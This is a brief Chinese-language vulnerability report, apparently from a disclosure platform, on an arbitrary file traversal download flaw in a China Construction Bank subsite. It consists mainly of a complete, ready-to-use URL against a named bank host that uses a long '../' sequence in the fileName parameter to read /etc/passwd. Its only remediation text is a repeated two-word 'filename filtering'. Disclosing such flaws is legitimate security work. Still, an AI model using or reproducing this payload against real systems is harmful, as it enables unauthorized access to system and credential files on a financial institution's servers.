中国建设银行子站任意文件遍历下载漏洞
URL:https://b2b.ccb.cn:1025/NCCB/B2BFileIBSContentServlet?fileName=../../../../../../../../../../../../../../../../etc/passwd&branchId=999999001&language=CN&ibsReqType=2
修复方案: 文件名过滤。
文件名过滤。